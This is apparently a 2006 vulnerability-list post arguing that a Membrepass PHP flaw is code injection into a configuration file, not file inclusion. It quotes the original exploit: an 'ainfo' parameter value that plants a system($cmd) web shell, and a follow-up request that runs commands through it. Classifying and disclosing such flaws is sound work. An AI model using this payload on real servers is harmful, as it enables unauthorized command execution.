[VIM] membrepass PHP execution issue probably isn't file inclusion
Steven M. Christey
coley at mitre.org
Fri Sep 1 16:05:17 EDT 2006
Ref:
BUGTRAQ:20060831 Membrepass v1.5 Php code execution, Xss, Sql Injection
URL:http://www.securityfocus.com/archive/1/archive/1/444845/100/0/threaded
This is being referred to as file inclusion by some people, but it's
what CVE is calling "direct static code injection" (though I'll
probably drop the "direct" soon).
That's the term we use for when a product accepts user input and
inserts it directly into an executable PHP file that the product uses,
normally for configuration variables.
The relevant exploit from the original disclosure is:
GET /include/change.php
DATA ainfo="; $cmd = $_GET['cmd']; system($cmd); exit;
The ainfo parameter isn't getting a URL, so that should be a tip that
it's not file inclusion.
Then you have a direct request:
http://.../include/variable.php?cmd=dir POST
... which is probably the file that the code is being inserted into.
- Steve
More information about the VIM
mailing list